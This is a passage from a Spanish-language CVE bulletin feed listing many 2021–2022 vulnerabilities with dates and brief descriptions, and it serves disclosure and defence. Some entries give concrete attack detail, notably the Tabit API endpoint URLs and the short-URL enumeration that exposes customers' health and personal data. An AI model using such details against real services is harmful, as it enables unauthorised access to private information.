    Fecha de publicación: 19/08/2022
    Fecha de última actualización: 08/08/2023
    StreamLabs Desktop Application versión 1.9.0, es vulnerable a un Control de Acceso Incorrecto por medio del archivo obs64.exe. Un atacante puede ejecutar código arbitrario por medio de un archivo .exe diseñado.
  • CVE-2022-35167
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Printix Cloud Print Management versión v1.3.1149.0 para Windows contiene permisos no seguros.
  • CVE-2022-1901
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/08/2022
    Fecha de última actualización: 08/08/2023
    En versiones afectadas de Octopus Deploy es posible desenmascarar variables confidenciales usando la visualización previa de variables.
  • CVE-2022-38493
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/08/2022
    Fecha de última actualización: 08/08/2023
    Rhonabwy versiones 0.9.99 hasta 1.1.x anteriores a 1.1.7, no comprueba la longitud de la clave privada RSA antes del descifrado RSA-OAEP. Esto permite a atacantes causar una denegación de servicio por medio de un token JWE (JSON Web Encryption) diseñado.
  • CVE-2022-2841
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/08/2022
    Fecha de última actualización: 21/07/2023
    Se ha encontrado una vulnerabilidad en CrowdStrike Falcon versiones 6.31.14505.0/6.42.15610. Ha sido clasificada como problemática. El manipulador de desinstalación afectado permite omitir y deshabilitar la función de seguridad. La manipulación conlleva a una falta de autorización. El identificador de esta vulnerabilidad es VDB-206880.
  • CVE-2022-37134
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/08/2022
    Fecha de última actualización: 08/08/2023
    D-link DIR-816 versión A2_v1.10CNB04.img, es vulnerable a un Desbordamiento de Búfer por medio del archivo /goform/form2Wan.cgi. Cuando wantype es 3, l2tp_usrname será descifrado por base64, y el resultado es almacenado en v94, que no comprueba el tamaño de l2tp_usrname, resultando en un desbordamiento de pila.
  • CVE-2022-34775
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/08/2022
    Fecha de última actualización: 08/08/2023
    Tabit - Exposición excesiva de datos. Otro endpoint mapeado por la diminuta url, era uno para la cancelación de reservas, que contenía el ID de MongoDB de la reserva, y la organización. Esto puede ser usado para consultar la API http://tgm-api.tabit.cloud/rsv/management/{reservationId}?organization={orgId} API que devuelve muchos datos sobre la reserva (OWASP: API3): Nombre, correo, número de teléfono, el número de visitas del usuario a ese restaurante concreto, el dinero que ha gastado allí, el dinero que ha gastado en alcohol, si ha dejado un depósito, etc. Esta información puede usarse fácilmente para un ataque de phishing.
  • CVE-2022-34770
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/08/2022
    Fecha de última actualización: 08/08/2023
    Tabit - divulgación de información confidencial. Varias API del sistema web muestran, sin autorización, información confidencial como estados de salud, facturas anteriores en un determinado restaurante, consumo de alcohol y hábitos de fumar. Cada una de las APIs descritas, presenta en su URL uno o más ID de MongoDB que no es tan sencillo de enumerar. Sin embargo, cada una de ellas recibe una "pequeña URL" en el dominio de Tabit, en forma de https://tbit.be/{sufijo} siendo el sufijo una cadena de 5 caracteres que contiene números, letras minúsculas y mayúsculas. No es tan sencillo enumerarlas todas, pero sí encontrar algunas que funcionen y conlleven a un endpoint personal. Esto es tanto un ejemplo de OWASP: API4 - limitación de la tasa y OWASP: API1 - Autorización a nivel de objeto rota. Además, la URL de redireccionamiento divulgó los IDs de MongoDB comentados anteriormente, y podríamos usarlos para consultar otros endpoints divulgando más información personal. Por ejemplo: La URL https://tabitisrael.co.il/online-reservations/health-statement?orgId={org_id}&healthStatementId={health_statement_id} es usada para invitar a amigos a rellenar una declaración de salud antes de asistir al restaurante. Podemos usar el health_statement_id para acceder a la API https://tgm-api.tabit.cloud/health-statement/{health_statement_id} API que divulga la información médica y el número de identificación.
  • CVE-2022-33900
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/08/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inyección de objetos en PHP en el plugin Easy Digital Downloads versiones anteriores a 3.0.1 incluyéndola, en WordPress.
  • CVE-2022-31238
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/08/2022
    Fecha de última actualización: 08/08/2023
    Dell PowerScale OneFS, versiones 9.0.0 hasta 9.1.0.19, 9.2.1.12, 9.3.0.6, y 9.4.0.2 incluyéndola, contienen una vulnerabilidad de proceso invocado con información confidencial. Un usuario de la CLI puede explotar potencialmente esta vulnerabilidad, conllevando a una divulgación de información.
  • CVE-2022-38668
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/08/2022
    Fecha de última actualización: 08/08/2023
    Las aplicaciones HTTP (servidores) basadas en Crow hasta 1.0+4 pueden revelar datos no inicializados potencialmente sensibles de la memoria de la pila al cumplir con una solicitud de un archivo estático de menos de 16 KB
  • CVE-2022-40023
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/09/2022
    Fecha de última actualización: 08/08/2023
    Sqlalchemy mako versiones anteriores a 1.2.2, es vulnerable a una Denegación de Servicio de expresiones Regulares cuando es usada la clase Lexer para analizar. Esto también afecta a babelplugin y linguaplugin
  • CVE-2022-38638
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Casdoor versión v1.97.3, contiene una vulnerabilidad de escritura de archivos arbitraria por medio del parámetro fullFilePath en /api/upload-resource
  • CVE-2021-41817
    Severidad: MEDIA
    Fecha de publicación: 01/01/2022
    Fecha de última actualización: 08/08/2023
    Date.parse en date gem versiones hasta 3.2.0 para Ruby, permite ReDoS (expresión regular de denegación de servicio) por medio de una cadena larga. Las versiones corregidas son 3.2.1, 3.1.2, 3.0.2 y 2.0.1.
  • CVE-2021-40647
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/09/2022
    Fecha de última actualización: 08/08/2023
    En man2html versión 1.6g, una cadena específica que es leída desde un archivo sobrescribirá el parámetro de tamaño en el chunk superior del montón. Esto al menos causa que el programa aborte la segmentación si el parámetro de tamaño de la pila no está alineado correctamente. En versiones anteriores a 2.29 de GLIBC y alineado correctamente, permite una escritura arbitraria en cualquier parte de la memoria del programa
  • CVE-2022-25765
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/09/2022
    Fecha de última actualización: 08/08/2023
    El paquete pdfkit a partir de la versión 0.0.0, es vulnerable a una inyección de comandos cuando la URL no está saneada apropiadamente
  • CVE-2022-40299
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    En Singular versiones anteriores a 4.3.1, es usado un nombre de ruta /tmp predecible (por ejemplo, por sdb.cc), lo que permite a usuarios locales conseguir los privilegios de otros usuarios por medio de un procedimiento en un archivo bajo /tmp. NOTA: este registro CVE esta referido a sdb.cc y a archivos similares en la interfaz de Singular que presentan nombres de ruta /tmp predecibles; este registro CVE no esta referido a una falta de capacidad de creación de archivos temporales seguros en el lenguaje Singular
  • CVE-2021-23839
    Severidad: MEDIA
    Fecha de publicación: 16/02/2021
    Fecha de última actualización: 08/08/2023
    OpenSSL versión 1.0.2 soporta SSLv2. Si un cliente intenta negociar SSLv2 con un servidor que está configurado para soportar tanto SSLv2 como versiones más recientes de SSL y TLS, entonces se hace una comprobación de un ataque de retroceso de versión cuando se deshace una firma RSA. Los clientes que soportan versiones de SSL o TLS superiores a SSLv2 deben usar una forma especial de relleno. Un servidor que soporta una versión superior a SSLv2 debe rechazar los intentos de conexión de un cliente en el que esté presente esta forma especial de relleno, porque esto indica que se ha producido un retroceso de versión (es decir, tanto el cliente como el servidor soportan una versión superior a SSLv2, y sin embargo esta es la versión que se está requiriendo). La implementación de esta comprobación de padding invirtió la lógica para que el intento de conexión sea aceptado si el padding está presente, y rechazado si está ausente. Esto significa que tal servidor aceptará una conexión si se ha producido un ataque de retroceso de versión. Además, el servidor rechazará erróneamente una conexión si se realiza un intento de conexión SSLv2 normal. Sólo los servidores OpenSSL versión 1.0.2 desde la versión 1.0.2s hasta la 1.0.2x están afectados por este problema. Para ser vulnerable, un servidor versión 1.0.2 debe 1) haber configurado la compatibilidad con SSLv2 en tiempo de compilación (está desactivada por defecto), 2) haber configurado la compatibilidad con SSLv2 en tiempo de ejecución (está deshabilitada por defecto), 3) haber configurado los ciphersuites de SSLv2 (no están en la lista de ciphersuites por defecto) OpenSSL versión 1.1.1 no presenta compatibilidad con SSLv2 y, por tanto, no es vulnerable a este problema. El error subyacente está en la implementación de la función RSA_padding_check_SSLv23(). Esto también afecta al modo de relleno RSA_SSLV23_PADDING usado por otras funciones. Aunque la versión 1.1.1 no soporta SSLv2, la función RSA_padding_check_SSLv23() sigue existiendo, al igual que el modo de relleno RSA_SSLV23_PADDING. Las aplicaciones que llamen directamente a esa función o utilicen ese modo de relleno se encontrarán con este problema. Sin embargo, como no existe soporte para el protocolo SSLv2 en la versión 1.1.1, esto se considera un error y no un problema de seguridad en esa versión. OpenSSL versión 1.0.2 está fuera de soporte y ya no recibe actualizaciones públicas. Los clientes de soporte Premium de OpenSSL versión 1.0.2 deben actualizar a la versión 1.0.2y. Los demás usuarios deben actualizar a la versión 1.1.1j. Corregido en OpenSSL versión 1.0.2y (Afectó versiones 1.0.2s-1.0.2x)
  • CVE-2022-27969
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado Cynet 360 Web Portal versiones anteriores a v4.5, para permitir a atacantes acceder a una lista de usuarios señuelo por medio de una petición GET diseñada enviada a /WebApp/DeceptionUser/GetAllDeceptionUsers
  • CVE-2022-27967
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado Cynet 360 Web Portal versiones anteriores a v4.5, para permitir a atacantes acceder a una lista de archivos y perfiles excluidos por medio de una petición GET diseñada enviada a /WebApp/SettingsExclusion/GetExclusionsProfiles
  • CVE-2022-27968
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado Cynet 360 Web Portal versiones anteriores a v4.5, para permitir a atacantes acceder a una lista de archivos y perfiles monitoreados por medio de una petición GET diseñada enviada a /WebApp/SettingsFileMonitor/GetFileMonitorProfiles
  • CVE-2022-23690
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en la interfaz de administración basada en la web de AOS-CX podría permitir a un atacante remoto no autenticado obtener una huella digital de la versión exacta de AOS-CX que es ejecutada en el switch. Esto permite que un atacante recupere información que podría ser usada para apuntar con mayor precisión al switch para su posterior explotación en ArubaOS-CX versión(es): AOS-CX 10.10.xxxx: 10.10.0002 y anteriores, AOS-CX 10.09.xxxx: 10.09.1020 y anteriores, AOS-CX 10.08.xxxx: 10.08.1060 y anteriores, AOS-CX 10.06.xxxx: 10.06.0200 y anterior. Aruba ha publicado actualizaciones para los dispositivos ArubaOS-CX Switches que abordan esta vulnerabilidad de seguridad.
  • CVE-2022-23688
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    Se presentan múltiples vulnerabilidades en el procesamiento de datos de paquetes por el servicio LLDP de AOS-CX. Una explotación con éxito de estas vulnerabilidades puede permitir a un atacante impactar la disponibilidad del servicio LLDP de AOS-CX y/o el plano de administración del switch en ArubaOS-CX Switches versión(es): AOS-CX 10.09.xxxx: 10.09.1010 y anteriores, AOS-CX 10.08.xxxx: 10.08.1050 y anteriores, AOS-CX 10.06.xxxx: 10.06.0190 y anteriores. Aruba ha publicado actualizaciones para los dispositivos ArubaOS-CX Switches que abordan estas vulnerabilidades de seguridad.
  • CVE-2022-37734
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/09/2022
    Fecha de última actualización: 08/08/2023
    graphql-java before19.0 es vulnerable a la denegación de servicio. Un atacante puede enviar una consulta GraphQL maliciosa que consuma recursos de la CPU. Las versiones corregidas son 19.0 y posteriores, 18.3 y 17.4, y 0.0.0-2022-07-26T05-45-04-226aabd9
  • CVE-2022-23689
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    Se presentan múltiples vulnerabilidades en el procesamiento de datos de paquetes por el servicio LLDP de AOS-CX. Una explotación con éxito de estas vulnerabilidades puede permitir a un atacante impactar la disponibilidad del servicio LLDP de AOS-CX y/o el plano de administración del switch en ArubaOS-CX Switches versión(es): AOS-CX 10.09.xxxx: 10.09.1010 y anteriores, AOS-CX 10.08.xxxx: 10.08.1050 y anteriores, AOS-CX 10.06.xxxx: 10.06.0190 y anteriores. Aruba ha publicado actualizaciones para los dispositivos ArubaOS-CX Switches que abordan estas vulnerabilidades de seguridad.
  • CVE-2022-23686
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    Se presentan múltiples vulnerabilidades en el procesamiento de datos de paquetes por el servicio LLDP de AOS-CX. Una explotación con éxito de estas vulnerabilidades puede permitir a un atacante impactar la disponibilidad del servicio LLDP de AOS-CX y/o el plano de administración del switch en ArubaOS-CX Switches versión(es): AOS-CX 10.09.xxxx: 10.09.1010 y anteriores, AOS-CX 10.08.xxxx: 10.08.1050 y anteriores, AOS-CX 10.06.xxxx: 10.06.0190 y anteriores. Aruba ha publicado actualizaciones para los dispositivos ArubaOS-CX Switches que abordan estas vulnerabilidades de seguridad
  • CVE-2022-23687
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/09/2022
    Fecha de última actualización: 08/08/2023
    Se presentan múltiples vulnerabilidades en el procesamiento de datos de paquetes por el servicio LLDP de AOS-CX. Una explotación con éxito de estas vulnerabilidades puede permitir a un atacante impactar la disponibilidad del servicio LLDP de AOS-CX y/o el plano de administración del switch en ArubaOS-CX Switches versión(es): AOS-CX 10.09.xxxx: 10.09.1010 y anteriores, AOS-CX 10.08.xxxx: 10.08.1050 y anteriores, AOS-CX 10.06.xxxx: 10.06.0190 y anteriores. Aruba ha publicado actualizaciones para los dispositivos ArubaOS-CX Switches que abordan estas vulnerabilidades de seguridad.
  • CVE-2022-38531
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/09/2022
    Fecha de última actualización: 08/08/2023
    FPT G-97RG6M versiones R4.2.98.035 y G-97RG3 R4.2.43.078, son vulnerables a una ejecución de comandos remota en la función ping
  • CVE-2022-30078
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/09/2022
    Fecha de última actualización: 08/08/2023
    Las versiones del firmware NETGEAR versiones R6200_V2 hasta R6200v2-V1.0.3.12_10.1.11 y las versiones del firmware R6300_V2 hasta R6300v2-V1.0.4.52_10.0.93, permiten a atacantes remotos autenticados ejecutar un comando arbitrario por medio de meta caracteres de shell en los parámetros ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length o ipv6_lan_length
  • CVE-2022-37860
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/09/2022
    Fecha de última actualización: 08/08/2023
    La interfaz de configuración web del TP-Link M7350 versión V3, con la versión de firmware 190531, está afectada por una vulnerabilidad de inyección de comandos de preautenticación
  • CVE-2022-27942
    Severidad: MEDIA
    Fecha de publicación: 26/03/2022
    Fecha de última actualización: 08/08/2023
    tcpprep en Tcpreplay versión 4.4.1 presenta una lectura excesiva de búfer en la región heap de la memoria en la función parse_mpls en el archivo common/get.c
  • CVE-2022-27941
    Severidad: MEDIA
    Fecha de publicación: 26/03/2022
    Fecha de última actualización: 08/08/2023
    tcprewrite en Tcpreplay versión 4.4.1 presenta una lectura excesiva de búfer en la región heap de la memoria en la función get_l2len_protocol en el archivo common/get.c
  • CVE-2022-27940
    Severidad: MEDIA
    Fecha de publicación: 26/03/2022
    Fecha de última actualización: 08/08/2023
    tcprewrite en Tcpreplay versión 4.4.1, presenta una lectura excesiva de búfer en la región heap de la memoria en la función get_ipv6_next en el archivo common/get.c
  • CVE-2022-35572
    Severidad: Pendiente de análisis
    Fecha de publicación: 12/09/2022
    Fecha de última actualización: 08/08/2023
    En el router WiFi Linksys E5350 con la versión de firmware 1.0.00.037 y anteriores, (y potencialmente en otros vendedores/dispositivos debido a un reúso del código), el URI /SysInfo.htm no requiere un ID de sesión. Esta página web llama a una función show_sysinfo que recupera las contraseñas WPA, los SSID, las direcciones MAC, los números de serie, los pines WPS y las versiones de hardware/firmware, e imprime esta información en la página web. Esta página web es visible cuando la administración remota está habilitada. Un usuario que tenga acceso a la interfaz web del dispositivo puede extraer estos secretos. Si el dispositivo presenta habilitada la administración remota y está conectado directamente a Internet, esta vulnerabilidad es explotable a través de Internet sin interacción
  • CVE-2022-28741
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/09/2022
    Fecha de última actualización: 08/08/2023
    aEnrich a+HRD Learning Management Key Performance Indicator System versión 5.x, presenta una vulnerabilidad de inclusión de archivos locales (LFI) que se produce debido a una falta de comprobación de entrada en versión v5.x
  • CVE-2022-34165
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/09/2022
    Fecha de última actualización: 08/08/2023
    IBM WebSphere Application Server versiones 7.0, 8.0, 8.5 y 9.0 e IBM WebSphere Application Server Liberty versiones 17.0.0.3 a 22.0.0.9 son vulnerables a una inyección de encabezados HTTP, causada por una comprobación inapropiada. Esto podría permitir a un atacante conducir varios ataques contra el sistema vulnerable, incluyendo el envenenamiento de la caché y ataques de tipo cross-site scripting. ID de IBM X-Force ID: 229429
  • CVE-2022-40307
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en el kernel de Linux versiones hasta 5.19.8. El archivo drivers/firmware/efi/capsule-loader.c presenta una condición de carrera con un uso de memoria previamente liberada resultante
  • CVE-2021-45450
    Severidad: MEDIA
    Fecha de publicación: 21/12/2021
    Fecha de última actualización: 20/07/2023
    En Mbed TLS versiones anteriores a 2.28.0 y 3.x versiones anteriores a 3.1.0, las funciones psa_cipher_generate_iv y psa_cipher_encrypt permiten omitir la política o el descifrado basado en oráculos cuando el búfer de salida es encontrado en ubicaciones de memoria accesibles para una aplicación no confiable
  • CVE-2022-33747
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Arm: consumo de memoria sin límites para las tablas de páginas de segundo nivel determinadas acciones requieren, por ejemplo, eliminar páginas del mapeo P2M (Physical-to-Machine) de un huésped. Cuando son usadas páginas grandes para mapear páginas de huéspedes en las tablas de páginas de segundo nivel, dicha operación de eliminación puede incurrir en una asignación de memoria (para reemplazar un mapeo grande con otros individuales más pequeños). Estas asignaciones de memoria son tomadas del pool de memoria global. Un huésped malicioso podría causar el agotamiento del pool de memoria global al manipular sus propios mapeos P2M
  • CVE-2022-33746
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    La liberación del pool P2M puede tardar demasiado El pool P2M que respalda la traducción de direcciones de segundo nivel para huéspedes puede tener un tamaño considerable. Por lo tanto, su liberación puede tomar más tiempo de lo que es razonable sin comprobaciones intermedias de preferencia. Esta comprobación de la necesidad de adelantarse no existía hasta ahora
  • CVE-2022-32883
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de lógica con restricciones mejoradas. Este problema es corregido en macOS Monterey versión 12.6, iOS versión 15.7 y iPadOS versión 15.7, iOS versión 16, macOS Big Sur versión 11.7. Una aplicación puede ser capaz de leer información de localización confidencial
  • CVE-2022-32854
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Este problema se abordó con comprobaciones mejoradas. Este problema es corregido en iOS versión 15.7 y iPadOS versión 15.7, iOS versión 16, macOS Big Sur versión 11.7. Una aplicación puede omitir las preferencias de Privacidad
  • CVE-2022-3080
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    Mediante el envío de consultas específicas al resolver, un atacante puede causar la caída de named
  • CVE-2022-38178
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    Al falsificar el resolver objetivo con respuestas que presentan una firma EdDSA malformada, un atacante puede desencadenar una pequeña pérdida de memoria. Es posible erosionar gradualmente la memoria disponible hasta el punto de que named sea bloqueado por falta de recursos
  • CVE-2022-38177
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    Al falsificar el resolver objetivo con respuestas que presentan una firma ECDSA malformada, un atacante puede desencadenar una pequeña pérdida de memoria. Es posible erosionar gradualmente la memoria disponible hasta el punto de que named sea bloqueado por falta de recursos
  • CVE-2022-2795
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 08/08/2023
    Al inundar el resolvedor de destino con consultas que explotan este fallo, un atacante puede perjudicar significativamente el rendimiento del resolvedor, negando efectivamente a los clientes legítimos el acceso al servicio de resolución DNS
  • CVE-2019-19527
    Severidad: ALTA
    Fecha de publicación: 03/12/2019
    Fecha de última actualización: 04/08/2023
    En el kernel de Linux versiones anteriores a 5.2.10, se presenta un bug de uso de la memoria previamente liberada que puede ser causado por un dispositivo USB malicioso en el controlador del archivo drivers/hid/usbhid/hiddev.c, también se conoce como CID-9c09b214f30e.
  • CVE-2022-39173
    Severidad: Pendiente de análisis
    Fecha de publicación: 28/09/2022
    Fecha de última actualización: 08/08/2023
    En wolfSSL versiones anteriores a 5.5.1, los clientes maliciosos pueden causar un desbordamiento de búfer durante un handshake TLS versión 1.3. Esto ocurre cuando un atacante supuestamente reanuda una sesión TLS anterior. Durante la reanudación del Client Hello debe lanzarse una petición de reintento de Hello. Es requerido que ambos Client Hellos contengan una lista de suites de cifrado duplicadas para desencadenar un desbordamiento del búfer. En total, dos Client Hellos deben enviarse: uno en la sesión reanudada, y un segundo como respuesta a un mensaje Hello Retry Request
  • CVE-2022-20422
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    En la función emulation_proc_handler del archivo armv8_deprecated.c, se presenta una posible forma de corromper la memoria debido a una condición de carrera. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android kernel, ID de Android: A-237540956, Referencias: Kernel ascendente
  • CVE-2022-41222
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/09/2022
    Fecha de última actualización: 21/07/2023
    El archivo mm/mremap.c en el kernel de Linux versiones anteriores a 5.13.3, presenta un uso de memoria previamente liberada por medio de un TLB obsoleto porque un bloqueo rmap no es mantenido durante un movimiento PUD
  • CVE-2022-39190
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en el archivo net/netfilter/nf_tables_api.c en el kernel de Linux versiones anteriores a 5.19.6. Puede producirse una denegación de servicio al vincularse a una cadena ya vinculada
  • CVE-2022-0171
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/08/2022
    Fecha de última actualización: 21/07/2023
    Se ha encontrado un fallo en el kernel de Linux. La API existente de KVM SEV presenta una vulnerabilidad que permite que una aplicación a nivel de usuario no root (anfitrión) bloquee el kernel del anfitrión al crear una instancia de VM de invitado confidencial en la CPU de AMD que admite la virtualización cifrada segura (SEV).
  • CVE-2022-32811
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/08/2022
    Fecha de última actualización: 08/08/2023
    Se ha solucionado una vulnerabilidad de corrupción de memoria con un bloqueo mejorado. Este problema es corregido en macOS Monterey versión 12.5, macOS Big Sur versión 11.6.8 y Security Update 2022-005 Catalina. Una aplicación puede ser capaz de ejecutar código arbitrario con privilegios del núcleo.
  • CVE-2022-22583
    Severidad: BAJA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de permisos con una comprobación mejorada. Este problema es corregido en Security Update 2022-001 Catalina, macOS Monterey versión 12.2, macOS Big Sur versión 11.6.3. Una aplicación podría acceder a archivos restringidos
  • CVE-2021-43267
    Severidad: ALTA
    Fecha de publicación: 02/11/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en el archivo net/tipc/crypto.c en el kernel de Linux versiones anteriores a 5.14.16. La funcionalidad Transparent Inter-Process Communication (TIPC) permite a atacantes remotos explotar una comprobación insuficiente de los tamaños suministrados por el usuario para el tipo de mensaje MSG_CRYPTO
  • CVE-2021-39045
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/09/2022
    Fecha de última actualización: 08/08/2023
    IBM Cognos Analytics versiones 11.1.7, 11.2.0 y 11.2.1, podrían permitir a un atacante local obtener información debido a la funcionalidad autocomplete en los campos de entrada de contraseñas. IBM X-Force ID: 214345
  • CVE-2022-30614
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/09/2022
    Fecha de última actualización: 08/08/2023
    IBM Cognos Analytics versiones 11.1.7, 11.2.0 y 11.2.1, es vulnerable a una denegación de servicio por inundación de correo electrónico causada por el envío de una petición especialmente diseñada. Un atacante remoto podría aprovechar esta vulnerabilidad para causar que el servidor consuma todos los recursos de CPU disponibles. IBM X-Force ID: 227591
  • CVE-2022-38341
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/09/2022
    Fecha de última actualización: 08/08/2023
    Safe Software FME Server v2021.2.5 e inferior no emplea la validación del lado del servidor
  • CVE-2022-38791
    Severidad: Pendiente de análisis
    Fecha de publicación: 27/08/2022
    Fecha de última actualización: 08/08/2023
    En MariaDB versiones anteriores a 10.9.2, la función compress_write en el archivo extra/mariabackup/ds_compress.cc no libera data_mutex tras un fallo de escritura en el flujo, lo que permite a usuarios locales desencadenar un bloqueo.
  • CVE-2022-0581
    Severidad: MEDIA
    Fecha de publicación: 14/02/2022
    Fecha de última actualización: 08/08/2023
    Un bloqueo en el disector de protocolos CMS en Wireshark versiones 3.6.0 a 3.6.1 y versiones 3.4.0 a 3.4.11, permite una denegación de servicio por medio de una inyección de paquetes o un archivo de captura diseñado
  • CVE-2022-0582
    Severidad: ALTA
    Fecha de publicación: 14/02/2022
    Fecha de última actualización: 08/08/2023
    Un acceso no alineado en el disector del protocolo CSN.1 en Wireshark versiones 3.6.0 a 3.6.1 y versiones 3.4.0 a 3.4.11, permite una denegación de servicio por medio de una inyección de paquetes o un archivo de captura diseñado
  • CVE-2022-41040
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Microsoft Exchange Server
  • CVE-2022-41082
    Severidad: Pendiente de análisis
    Fecha de publicación: 02/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Microsoft Exchange Server
  • CVE-2022-36944
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 27/07/2023
    Scala versiones 2.13.x anteriores a 2.13.9 tiene una cadena de deserialización de Java en su archivo JAR. Por sí sola, no puede ser explotada. Sólo existe un riesgo en conjunto con la deserialización de objetos Java dentro de una aplicación. En tales situaciones, permite a los atacantes borrar el contenido de archivos arbitrarios, hacer conexiones de red, o posiblemente ejecutar código arbitrario (específicamente, funciones Function0) a través de una cadena de gadgets.
  • CVE-2022-40768
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/09/2022
    Fecha de última actualización: 08/08/2023
    El archivo drivers/scsi/stex.c en el kernel de Linux versiones hasta 5.19.9, permite a usuarios locales obtener información confidencial de la memoria del kernel porque stex_queuecommand_lck carece de memset para el caso PASSTHRU_CMD
  • CVE-2022-37893
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/10/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de inyección de comandos autenticados en la interfaz de línea de comandos de Aruba InstantOS y ArubaOS versión 10. Una explotación con éxito de esta vulnerabilidad resulta en la capacidad de ejecutar comandos arbitrarios como un usuario privilegiado en el sistema operativo subyacente de Aruba InstantOS versiones 6.4.x: 6.4.4.8-4.2.4.20 y anteriores; Aruba InstantOS 6.5.x: 6.5.4. 23 y siguientes; Aruba InstantOS 8.6.x: 8.6.0.18 y siguientes; Aruba InstantOS 8.7.x: 8.7.1.9 y siguientes; Aruba InstantOS 8.10.x: 8.10.0.1 y siguientes; ArubaOS 10.3.x: 10.3.1.0 y siguientes; Aruba ha publicado actualizaciones para Aruba InstantOS que solucionan esta vulnerabilidad de seguridad
  • CVE-2002-20001
    Severidad: MEDIA
    Fecha de publicación: 11/11/2021
    Fecha de última actualización: 16/08/2023
    El Protocolo de Acuerdo de Claves Diffie-Hellman permite a atacantes remotos (del lado del cliente) enviar números arbitrarios que en realidad no son claves públicas, y desencadenar costosos cálculos de exponenciación modular DHE del lado del servidor, también se conoce como un ataque D(HE)ater. El cliente necesita muy pocos recursos de CPU y ancho de banda de red. El ataque puede ser más perturbador en los casos en los que un cliente puede exigir al servidor que seleccione su mayor tamaño de clave soportado. El escenario básico del ataque es que el cliente debe afirmar que sólo puede comunicarse con DHE, y el servidor debe estar configurado para permitir DHE
  • CVE-2022-2783
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/10/2022
    Fecha de última actualización: 08/08/2023
    En versiones afectadas de Octopus Server se ha identificado que una cookie de sesión podía ser usada como token de tipo CSRF
  • CVE-2022-41352
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/09/2022
    Fecha de última actualización: 08/08/2023
